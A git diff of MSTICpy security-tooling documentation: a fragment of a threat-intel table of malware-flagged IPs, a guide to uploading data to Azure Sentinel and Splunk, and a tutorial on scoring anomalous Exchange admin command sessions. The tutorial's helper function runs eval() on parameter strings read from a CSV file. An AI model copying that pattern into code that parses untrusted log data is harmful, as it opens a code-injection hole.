++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 2 | 91.219.29.81    | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-12T00:00:00Z) | where Ti...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '3F458D91A21866C9037B99D997379A6906573766C0C2F8FB45327A6A15676A0D', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 3 | 89.108.83.196   | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-12T00:00:00Z) | where Ti...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': 'C3CA82D5B30A34F4BD6188C9DCFAD9E46D3C0CC45CC4FD969DA3A398DC34B1AE', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 4 | 192.42.116.41   | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-12T00:00:00Z) | where Ti...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '2F321C9D2593B6EF59DEB64B6CB209F375529C429F0DF463D639784E7353AA5D', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
diff --git a/docs/source/data_acquisition/UploadData.rst b/docs/source/data_acquisition/UploadData.rst
new file mode 100644
index 000000000..621675e5a
--- /dev/null
+++ b/docs/source/data_acquisition/UploadData.rst
@@ -0,0 +1,141 @@
+Data Uploaders
+==============
+
+As well as retrieving data from a data source you may wish to upload a data set to a data source.
+This may be a local data file you want to add to you centralized data source or they may be findings
+from your investigation that you want to store long term.
+MSTICpy contains data uploader functions for both Azure Sentinel/Log Analytics, and Splunk data sources.
+Data can be provided to both uploaders as a Pandas DataFrame, value separated file (e.g. csv, tsv),
+or a folder path of value separated files.
+
+Uploading data to Azure Sentinel/Log Analytics
+----------------------------------------------
+
+Instantiating the Azure Sentinel uploader
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+The first step in uploading data is to instantiate an uploader for the location we wish to upload data to.
+For Azure Sentinel there are two parameters that need to be passed at this stage,
+the workspace ID of the workspace to upload data to, and the workspace key.
+
+**Note that these are different from the details required to query data from Log Analytics using the DataProvider.
+Your workspace key can be found under the Advanced setting tab of your Log Analytics workspace.**
+
+.. code:: ipython3
+
+	from msticpy.data.uploader.loganalytics_uploader import LAUploader
+	laup = LAUploader(workspace=WORKSPACE_ID, workspace_secret=WORKSPACE_KEY)
+
+You can also set a ``debug`` flag when instantiating which will provide additional progress messages during an upload process.
+
+Uploading a DataFrame to Azure Sentinel
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+To upload a Pandas DataFrame to Log Analytics you simply pass the DataFrame to ``.upload_df()`` along with the name of a table
+you wish the data to be uploaded to. If that table exists the data will be appended to it, alternatively the table will be created.
+Note that all tables fall under the Custom Log category so any name you provide will be appended with _CL (i.e. table_name will be table_name_CL).
+Log Analytics will parse each column in the DataFrame into a column in the resulting table.
+
+*Note: table_name cannot contain any special characters except `_` all other characters will be removed.*
+
+.. code:: ipython3
+
+	laup.upload_df(data=DATAFRAME, table_name=TABLE_NAME)
+
+Uploading a File to Azure Sentinel
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+To upload a file to Log Analytics pass the path to the file to ``.upload_file()``. By default a comma separated
+value file is expected but if you have some other separator value you can pass this with the ``delim`` parameter.
+You can specify a table name to upload the data to with that ``table_name`` parameter but by default the uploader
+will upload to a table with the same name as the file.
+
+.. code:: ipython3
+
+	laup.upload_file(file_path=FILE_PATH)
+
+Uploading a Folder to Azure Sentinel
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You can also upload a whole folder of files. To do this simply pass the folder path to ``.upload_folder()``.
+By default this will upload all csv files in that folder to the Log Analytics workspace, with each file being
+uploaded to a table with a name corresponding to the file name. Alternatively you can also specify single a table
+name under which all files will be uploaded. If you have some other separated value file type you can pass ``delim``,
+and the specified delimiter value, however currently there is only support for a single delim type across files.
+By default this method attempts to upload all files in the specified folders, if you want to only process certain file
+extensions you can pass the ``glob`` keyword parameter with the a pattern for files to attempt to upload. The
+pattern format required follows the ``pathlib.glob()`` pattern - more details are avaliable `here <"https://docs.python.org/3/library/pathlib.html#pathlib.Path.glob>`_
+
+.. code:: ipython3
+
+	laup.upload_folder(folder_path=FOLDER_PATH, glob="*.csv")
+
+During upload a progress bar will be displayed showing the upload process of the files within the folder.
+
+Uploading data to Splunk
+------------------------
+
+Instantiating the Splunk uploader
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+The first step in uploading data is to instantiate an uploader for the location we wish to upload data to.
+For Splunk there are three parameters that need to be passed at this stage, the Splunk host name, a username,
+and a password. You can also pass a parameter for ``port``, by default this value is 8089.
+
+.. code:: ipython3
+
+	from msticpy.data.uploaders.splunk_uploader import SplunkUploader
+	spup = SplunkUploader(username=USERNAME, host=HOST, password=PASSWORD)
+
+You can also set a ``debug`` flag when instantiating which will provide additional progress messages during an upload process.
+
+*Note: Due to the way Splunk API's work the time taken to upload a file to Splunk can be significantly longer than
+with Log Analytics.*
+
+Uploading a DataFrame to Splunk
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+To upload a Pandas DataFrame to Splunk you simply pass the DataFrame to ``.upload_df()`` along with the name of a table,
+and index you wish the data to be uploaded to. If the index provided does not exist and you want it to be created,
+you can pass the parameter ``create_idx = True``.
+
+.. Note – table name for Splunk refers to sourcetype.
+
+.. code:: ipython3
+
+	spup.upload_df(data=DATAFRAME, table_name=TABLE_NAME, index_name=INDEX_NAME)
+
+During upload a progress bar will be shown showing the upload process of the upload.
+
+Uploading a File to Splunk
+^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+To upload a file to Splunk pass the path to the file to ``.upload_file()`` along with the name of the index you
+want the data uploaded to. By default a comma separated value file is expected but if you have some other separator
+value you can pass this with the ``delim`` parameter. You can specify a table name to upload the data to with that ``table_name``
+parameter but by default the uploader will upload to a table with the same name as the file. As with uploading a DataFrame
+if the index provided does not exist and you want it to be created, you can pass the parameter ``create_idx = True``.
+
+.. code:: ipython3
+
+	spup.upload_file(file_path=FILE_PATH, index_name=INDEX_NAME)
+
+Uploading a Folder to Splunk
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You can also upload a whole folder of files. To do this simply pass the folder path to ``.upload_folder()`` along with the
+name of the index you want the data uploaded to. By default this will upload all csv files in that folder to Splunk,
+with each file being uploaded to a sourcetype with a name corresponding to the file name. Alternatively you can also
+specify single a table sourcetype which all files will be uploaded with the ``table_name`` parameter. If you have some
+other separated value file type you can pass ``delim``, and the specified delimiter value, however currently there is
+only support for a single delim type across files. By default this method attempts to upload all files in the specified
+folders, if you want to only process certain file extensions you can pass the ``glob`` keyword parameter with the a pattern
+for files to attempt to upload. The pattern format required follows the ``pathlib.glob()`` pattern - more details are
+avaliable `here <"https://docs.python.org/3/library/pathlib.html#pathlib.Path.glob>`_
+As with the other methods if the index provided does not exist and you want it to be created, you can pass the parameter ``create_idx = True``.
+
+.. code:: ipython3
+
+	spup.upload_folder(folder_path=FOLDER_PATH, index_name=INDEX_NAME)
+
+During upload a progress bar will be shown showing the upload process of the files within the folder.
diff --git a/docs/source/data_acquisition/_static/MordorBrowser-filter.png b/docs/source/data_acquisition/_static/MordorBrowser-filter.png
new file mode 100644
index 000000000..cfb666299
Binary files /dev/null and b/docs/source/data_acquisition/_static/MordorBrowser-filter.png differ
diff --git a/docs/source/data_acquisition/_static/MordorBrowser-std-query-browser.png b/docs/source/data_acquisition/_static/MordorBrowser-std-query-browser.png
new file mode 100644
index 000000000..7db834c8e
Binary files /dev/null and b/docs/source/data_acquisition/_static/MordorBrowser-std-query-browser.png differ
diff --git a/docs/source/data_acquisition/_static/MordorBrowser.png b/docs/source/data_acquisition/_static/MordorBrowser.png
new file mode 100644
index 000000000..b8117e326
Binary files /dev/null and b/docs/source/data_acquisition/_static/MordorBrowser.png differ
diff --git a/docs/source/data_acquisition/_static/TIBrowser.png b/docs/source/data_acquisition/_static/TIBrowser.png
new file mode 100644
index 000000000..fe569364e
Binary files /dev/null and b/docs/source/data_acquisition/_static/TIBrowser.png differ
diff --git a/docs/source/data_acquisition/_static/lxaudit-AzureSentinelTable.png b/docs/source/data_acquisition/_static/lxaudit-AzureSentinelTable.png
new file mode 100644
index 000000000..fcb558f98
Binary files /dev/null and b/docs/source/data_acquisition/_static/lxaudit-AzureSentinelTable.png differ
diff --git a/docs/source/data_acquisition/_static/lxaudit-ConnectSources.png b/docs/source/data_acquisition/_static/lxaudit-ConnectSources.png
new file mode 100644
index 000000000..e839afea7
Binary files /dev/null and b/docs/source/data_acquisition/_static/lxaudit-ConnectSources.png differ
diff --git a/docs/source/data_acquisition/_static/lxaudit-CustomLog.png b/docs/source/data_acquisition/_static/lxaudit-CustomLog.png
new file mode 100644
index 000000000..c19e7ff48
Binary files /dev/null and b/docs/source/data_acquisition/_static/lxaudit-CustomLog.png differ
diff --git a/docs/source/data_acquisition/_static/lxaudit-GettingStarted.png b/docs/source/data_acquisition/_static/lxaudit-GettingStarted.png
new file mode 100644
index 000000000..6f3c16e58
Binary files /dev/null and b/docs/source/data_acquisition/_static/lxaudit-GettingStarted.png differ
diff --git a/docs/source/data_acquisition/_static/lxaudit-SelectVM.png b/docs/source/data_acquisition/_static/lxaudit-SelectVM.png
new file mode 100644
index 000000000..17d6ecea1
Binary files /dev/null and b/docs/source/data_acquisition/_static/lxaudit-SelectVM.png differ
diff --git a/docs/source/data_analysis/AnomalousSequence.rst b/docs/source/data_analysis/AnomalousSequence.rst
new file mode 100644
index 000000000..0f09ba342
--- /dev/null
+++ b/docs/source/data_analysis/AnomalousSequence.rst
@@ -0,0 +1,2037 @@
+Anomalous Sessions
+==================
+
+Various types of security logs can be broken up into sessions/sequences
+where each session can be thought of as an ordered sequence of events.
+
+For example, we could treat the Exchange PowerShell cmdlets
+("Set-Mailbox", "Set-MailboxFolderPermission" etc)
+as "events" and then group the events into "sessions" on a per-user
+basis.
+
+It can be useful to model such sessions in order to understand what the
+usual activity is like so that we can highlight anomalous sequences of
+events.
+
+`Msticpy <https://github.com/microsoft/msticpy/tree/master/msticpy/analysis/anomalous_sequence>`__
+has a subpackage called anomalous\_sequence. This library allows the user to sessionize, model and
+visualize their data via some high level functions.
+
+We demonstrate how to use this subpackage on some Office Exchange Admin
+logs from one of our demo tenants. There is a section at the end where we
+demonstrate how some other log types can be sessionized as well.
+
+
+.. code:: ipython3
+
+    # Imports
+    from msticpy.nbtools.utility import check_py_version
+
+    MIN_REQ_PYTHON = (3, 6)
+    check_py_version(MIN_REQ_PYTHON)
+
+    from typing import List, Dict, Union
+
+    # setting pandas display options for dataframe
+    import pandas as pd
+    pd.set_option("display.max_rows", 100)
+    pd.set_option("display.max_columns", 50)
+    pd.set_option("display.max_colwidth", 100)
+
+    # msticpy imports
+    from msticpy.analysis.anomalous_sequence import sessionize
+    from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
+    from msticpy.analysis.anomalous_sequence import anomalous
+    from msticpy.analysis.anomalous_sequence.model import Model
+    from msticpy.data import QueryProvider
+    from msticpy.nbtools.wsconfig import WorkspaceConfig
+
+    %env KQLMAGIC_LOAD_MODE=silent
+
+    print('finished the imports')
+
+Creating the Sessions
+---------------------
+
+What is a Session?
+^^^^^^^^^^^^^^^^^^
+
+In this context, a session is an ordered sequence of events/commands.
+The anomalous\_sequence subpackage can handle 3 different formats for
+each of the sessions:
+
+| 1. sequence of just events/commands.
+
+.. code::
+
+    ["Set-User", "Set-Mailbox"]
+
+| 2. sequence of events/commands with accompanying parameters.
+
+.. code::
+
+    [Cmd(name="Set-User", params={"Identity', "Force"}),
+     Cmd(name="Set-Mailbox", params={"Identity", "AuditEnabled"})]
+
+| 3. sequence of events/commands with accompanying parameters and their
+ corresponding values.
+
+.. code::
+
+   [Cmd(name="Set-User", params={"Identity": "blahblah", "Force": 'true'}),
+    Cmd(name="Set-Mailbox", params={"Identity": "blahblah", "AuditEnabled": "false"})]
+
+The Cmd datatype can be accessed from
+msticpy.analysis.anomalous\_sequence.utils.data\_structures
+
+Creating your sessions
+^^^^^^^^^^^^^^^^^^^^^^
+
+In this section, we demonstrate how you can use msticpy to create
+sessions from your data.
+
+We read in some office exchange events from one of our demo tenants as a
+csv. (The csv can be found `here <https://github.com/microsoft/msticpy/tree/master/docs/notebooks/data>`__)
+
+.. code:: ipython3
+
+    exchange = pd.read_csv('data/demo_exchange_data.csv')
+
+.. code:: ipython3
+
+    exchange.head()
+
+
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>UserId</th>
+          <th>ClientIP</th>
+          <th>Operation</th>
+          <th>Parameters</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>2020-04-18T04:50:30Z</td>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>Set-ConditionalAccessPolicy</td>
+          <td>[\n  {\n    "Name": "Identity",\n    "Value": "seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-a...</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>2020-04-18T04:50:31Z</td>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>Set-ConditionalAccessPolicy</td>
+          <td>[\n  {\n    "Name": "Identity",\n    "Value": "seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9...</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>2020-04-18T04:50:30Z</td>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>Set-ConditionalAccessPolicy</td>
+          <td>[\n  {\n    "Name": "Identity",\n    "Value": "seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8...</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>2020-04-18T04:50:30Z</td>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>Set-ConditionalAccessPolicy</td>
+          <td>[\n  {\n    "Name": "Identity",\n    "Value": "seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-9...</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>2020-04-18T04:50:30Z</td>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>Set-ConditionalAccessPolicy</td>
+          <td>[\n  {\n    "Name": "Identity",\n    "Value": "seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-b...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+In the above example the ``Operation`` column will be our Cmd name.
+
+If you are only interested in modeling the commands (without the
+accompanying parameters), then you can skip this section and go straight
+to the next section, "Use the sessionize data function".
+
+In this section we will create some additonal columns to extract the parameters
+and parameter values. This is optional because each session is allowed to be either a
+list of strings, or a list of the Cmd datatype. The "Operation" column
+is a string already.
+
+However, if you are interested in including the parameters (and possibly
+the values), then we need to define a custom cleaning function which will
+combine the "Operation" and "Parameters" columns and convert them into one
+of the `allowed types <#what-is-a-session>`_. This cleaning function is specific
+to the format of the exchange demo data which we have read in.
+Therefore, you may need to tweak it before you can use it on other data
+sets.
+
+.. code:: ipython3
+
+    # let's define a helper function for creating columns which have the Cmd datatype
+
+    def clean_exchange_params(operation: str, parameters: Union[str, Dict], include_vals: bool):
+        params = parameters
+        if isinstance(parameters, str):
+            params = eval(params)
+        new = dict()
+        for dic in params:
+            new[dic['Name']] = dic['Value']
+        if include_vals:
+            return Cmd(name=operation, params=new)
+        return Cmd(name=operation, params=set(new.keys()))
+
+
+.. code:: ipython3
+
+    # let's apply the helper function we defined to create columns which have the Cmd datatype
+
+    exchange['cmd_param'] = exchange.\
+        apply(lambda x:
+              clean_exchange_params(operation=x['Operation'], parameters=x['Parameters'], include_vals=False), axis=1)
+
+    exchange['cmd_param_val'] = exchange.\
+        apply(lambda x:
+              clean_exchange_params(operation=x['Operation'], parameters=x['Parameters'], include_vals=True), axis=1)
+
+
+Use the sessionize\_data function
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+We will do this for the first session type (just commands and ignoring parameters).
+
+However, because we created columns for all three session types in the previous
+section, you can set the ``event_col`` parameter in the ``sessionize_data`` function below to
+any of the following:
+
+1. Operation
+2. cmd\_param
+3. cmd\_param\_val
+
+Here are some details about the arguments for the ``sessionize_data``
+function:
+
+::
+
+    Help on function sessionize_data in module msticpy.analysis.anomalous_sequence.sessionize:
+
+    sessionize_data(data: pd.DataFrame, user_identifier_cols: List[str], time_col: str,
+               max_session_time_mins: int, max_event_separation_mins: int,
+               event_col: str) -> pd.DataFrame
+
+        Sessionize the input data.
+
+        In particular, the resulting dataframe will have 1 row per session. It will contain the
+        following columns: the user_identifier_cols, <time_col>_min, <time_col>_max,
+        <event_col>_list, duration (<time_col>_max - <time_col>_min), number_events (length of the
+        <event_col>_list value)
+
+        Parameters
+        ----------
+        data: pd.DataFrame
+            This dataframe should contain at least the following columns:
+                - time stamp column
+                - columns related to user name and/or computer name and/or ip address etc
+                - column containing an event
+        user_identifier_cols: List[str]
+            Name of the columns which contain username and/or computer name and/or ip address etc.
+            Each time the value of one of these columns changes, a new session will be started.
+        time_col: str
+            Name of the column which contains a time stamp.
+            If this column is not already in datetime64[ns, UTC] format, it will be casted to it.
+        max_session_time_mins: int
+            The maximum length of a session in minutes. If a sequence of events for the same
+            user_identifier_cols values exceeds this length, then a new session will be started.
+        max_event_separation_mins: int
+            The maximum length in minutes between two events in a session. If we have 2 events for
+            the same user_identifier_cols values, and if those two events are more than
+            `max_event_separation_mins` apart, then a new session will be started.
+        event_col: str
+            Name of the column which contains the event of interest.
+            For example, if we are interested in sessionizing exchange admin commands,
+            the "event_col" could contain values like: "Set-Mailbox" or "Set-User" etc.
+
+        Returns
+        -------
+        pd.DataFrame containing the sessionized data. 1 row per session.
+
+.. code:: ipython3
+
+    # sessionize the data
+
+    sessions_df = sessionize.sessionize_data(
+        data=exchange,
+        user_identifier_cols=['UserId', 'ClientIP'],
+        time_col='TimeGenerated',
+        max_session_time_mins=20,
+        max_event_separation_mins=2,
+        event_col='Operation'
+    )
+
+.. code:: ipython3
+
+    sessions_df.shape
+
+
+
+
+.. parsed-literal::
+
+    (400, 7)
+
+
+
+.. code:: ipython3
+
+    sessions_df.head()
+
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>UserId</th>
+          <th>ClientIP</th>
+          <th>TimeGenerated_min</th>
+          <th>TimeGenerated_max</th>
+          <th>Operation_list</th>
+          <th>duration</th>
+          <th>number_events</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>
+          <td>NaN</td>
+          <td>2020-05-12 01:34:59+00:00</td>
+          <td>2020-05-12 01:35:02+00:00</td>
+          <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>
+          <td>00:00:03</td>
+          <td>13</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>
+          <td>NaN</td>
+          <td>2020-05-12 04:48:43+00:00</td>
+          <td>2020-05-12 04:48:46+00:00</td>
+          <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>
+          <td>00:00:03</td>
+          <td>13</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>
+          <td>NaN</td>
+          <td>2020-05-20 02:18:27+00:00</td>
+          <td>2020-05-20 02:18:31+00:00</td>
+          <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>
+          <td>00:00:04</td>
+          <td>14</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>
+          <td>NaN</td>
+          <td>2020-05-20 05:12:55+00:00</td>
+          <td>2020-05-20 05:12:58+00:00</td>
+          <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>
+          <td>00:00:03</td>
+          <td>14</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>
+          <td>NaN</td>
+          <td>2020-05-21 01:50:12+00:00</td>
+          <td>2020-05-21 01:50:13+00:00</td>
+          <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>
+          <td>00:00:01</td>
+          <td>14</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+
+
+Model the sessions
+------------------
+
+Model Details
+^^^^^^^^^^^^^
+
+We will give a brief description of how the modelling works under the
+hood for each of the three session types.
+
+-  **Commands only**
+
+   -  We treat the sessions as an ordered sequence of commands.
+   -  We apply the Markov assumption where we assume each command
+      depends only on the command immediately before it.
+   -  This means the likelihood of each session can be computed by
+      multiplying a sequence of transition probabilities together.
+   -  We use a sliding window (e.g. of length 3) throughout each session
+      and then use the likelihood of the rarest window as the score for
+      the session.
+
+-  **Commands with Parameters**
+
+   -  All of the above ("commands only" case) except for one difference
+      - this time, we include the parameters in the modelling.
+   -  We make the assumption that the presence of each parameter is
+      independent conditional on the command.
+   -  We therefore model the presence of the parameters as independent
+      Bernoulli random variables (conditional on the command)
+   -  So to compute the likelihood of a session, each transition
+      probability (of the commands) will be accompanied by a product of
+      probabilities (for the parameters).
+   -  A subtlety to note, is that we take the geometric mean of the
+      product of parameter probabilities. This is so we don't penalise
+      commands which happen to have more parameters set than on average.
+   -  We use the same sliding window approach used with the "commands
+      only" case.
+
+-  **Commands with Parameters and their Values**
+
+   -  All of the above ("commands with parameters" case) except that
+      the parameter values are also included in the modelling.
+   -  Some rough heuristics are used to determine which parameters have
+      values which are categorical (e.g. "true" and "false" or "high",
+      "medium" and "low") vs values which are arbitrary strings (such as
+      email addresses). There is the option to override the
+      "modellable\_params" directly in the Model class.
+   -  We also make the assumption that the values depend only on the
+      parameters and not on the command.
+   -  So to compute the likelihood of a session, each transition
+      probability (of the commands) will be accompanied by a product of
+      probabilities (for the parameters and categorical values).
+   -  We use the same sliding window approach used with the "commands
+      only" case.
+
+
+.. Important::
+   If you set the window length to be k, then only sessions which have at
+   least k-1 commands will have a valid (not np.nan) score. The reason for
+   the -1 is because we append an end token to each session by default, so
+   a session of length k-1 gets treated as length k during the scoring.
+
+**There are 3 high level functions available in this library**
+
+1. score\_sessions
+2. visualize\_scored\_sessions
+3. score\_and\_visualize\_sessions
+
+Use the score\_sessions function
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+In this example, we will do this for the "Commands Only" session type.
+
+.. tip:: Depending on which column you chose as the event\_col in the
+   `sessionize\_data function <#use-the-sessionize-data-function>`_, you could set the
+   "session\_column" parameter in the "score\_sessions" function below to
+   any of the following:
+
+    1. Operation\_list
+    2. cmd\_param\_list
+    3. cmd\_param\_val\_list
+
+Here are some details about the arguments for the ``score_sessions``
+function:
+
+::
+
+    Help on function score_sessions in module msticpy.analysis.anomalous_sequence.anomalous:
+
+    score_sessions(data: pd.DataFrame, session_column: str, window_length: int) -> pd.DataFrame
+
+        Model sessions using a sliding window approach within a markov model.
+
+        Parameters
+        ----------
+        data: pd.DataFrame
+            Dataframe which contains at least a column for sessions
+        session_column: str
+            name of the column which contains the sessions
+            The values in the session column should take one of the following formats:
+                examples formats of a session:
+                1) ['Set-User', 'Set-Mailbox']
+                2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+                    Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+                3) [Cmd(
+                        name='Set-User',
+                        params={'Identity': 'blahblah', 'Force': 'true'}
+                    ),
+                    Cmd(
+                        name='Set-Mailbox',
+                        params={'Identity': 'blahblah', 'AuditEnabled': 'false'}
+                    )]
+            The Cmd datatype can be accessed from
+            anomalous_sequence.utils.data_structures.Cmd
+        window_length: int
+            length of the sliding window to use when computing the likelihood
+            metrics for each session.
+            This should be set to an integer >= 2. Note that sessions which have
+            fewer commands than the chosen window_length + 1 will end up with a
+            np.nan score. (The + 1 is because we append a dummy `end_token` to each
+            session before starting the sliding window, so a session of length 2,
+            would be treated as length 3)
+
+        Returns
+        -------
+        input dataframe with two additional columns appended.
+
+This function will return a dataframe with two additonal columns appended:
+``rarest_window3_likelihood`` and ``rarest_window3``
+
+.. code:: ipython3
+
+    modelled_df = anomalous.score_sessions(
+        data=sessions_df,
+        session_column='Operation_list',
+        window_length=3
+    )
+
+Let's view the resulting dataframe in ascending order of the computed likelihood metric
+
+.. code:: ipython3
+
+    modelled_df.sort_values('rarest_window3_likelihood').head()
+
+
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>UserId</th>
+          <th>ClientIP</th>
+          <th>TimeGenerated_min</th>
+          <th>TimeGenerated_max</th>
+          <th>Operation_list</th>
+          <th>duration</th>
+          <th>number_events</th>
+          <th>rarest_window3_likelihood</th>
+          <th>rarest_window3</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>157</th>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>2020-03-26 22:40:30+00:00</td>
+          <td>2020-03-26 22:40:33+00:00</td>
+          <td>[New-Mailbox, Set-Mailbox]</td>
+          <td>00:00:03</td>
+          <td>2</td>
+          <td>0.000021</td>
+          <td>[New-Mailbox, Set-Mailbox]</td>
+        </tr>
+        <tr>
+          <th>216</th>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>2020-04-17 21:00:31+00:00</td>
+          <td>2020-04-17 21:00:31+00:00</td>
+          <td>[New-App, New-App]</td>
+          <td>00:00:00</td>
+          <td>2</td>
+          <td>0.000028</td>
+          <td>[New-App, New-App]</td>
+        </tr>
+        <tr>
+          <th>261</th>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>2020-05-06 01:49:17+00:00</td>
+          <td>2020-05-06 01:50:56+00:00</td>
+          <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>
+          <td>00:01:39</td>
+          <td>48</td>
+          <td>0.000063</td>
+          <td>[Set-ExchangeAssistanceConfig, Set-TransportConfig, Set-RecipientEnforcementProvisioningPolicy]</td>
+        </tr>
+        <tr>
+          <th>247</th>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>2020-05-02 11:31:53+00:00</td>
+          <td>2020-05-02 11:33:14+00:00</td>
+          <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>
+          <td>00:01:21</td>
+          <td>49</td>
+          <td>0.000081</td>
+          <td>[Set-ExchangeAssistanceConfig, Set-AdminAuditLogConfig, Set-TenantObjectVersion]</td>
+        </tr>
+        <tr>
+          <th>224</th>
+          <td>NaN</td>
+          <td>NaN</td>
+          <td>2020-04-23 21:42:48+00:00</td>
+          <td>2020-04-23 21:44:45+00:00</td>
+          <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>
+          <td>00:01:57</td>
+          <td>49</td>
+          <td>0.000085</td>
+          <td>[Set-OwaMailboxPolicy, Set-Mailbox, Add-MailboxPermission]</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+We can view individual sessions in more detail
+
+.. code:: ipython3
+
+    modelled_df.sort_values('rarest_window3_likelihood').rarest_window3.iloc[0]
+
+
+
+.. parsed-literal::
+
+    ['New-Mailbox', 'Set-Mailbox']
+
+
+Access the Model Class Directly
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Users who would like to have more control over the arguments used during
+the modelling can access the Model class directly.
+
+In particular, the user can specify whether start and end tokens
+are used during the likelihood calculations and also whether the
+geometric mean is used.
+
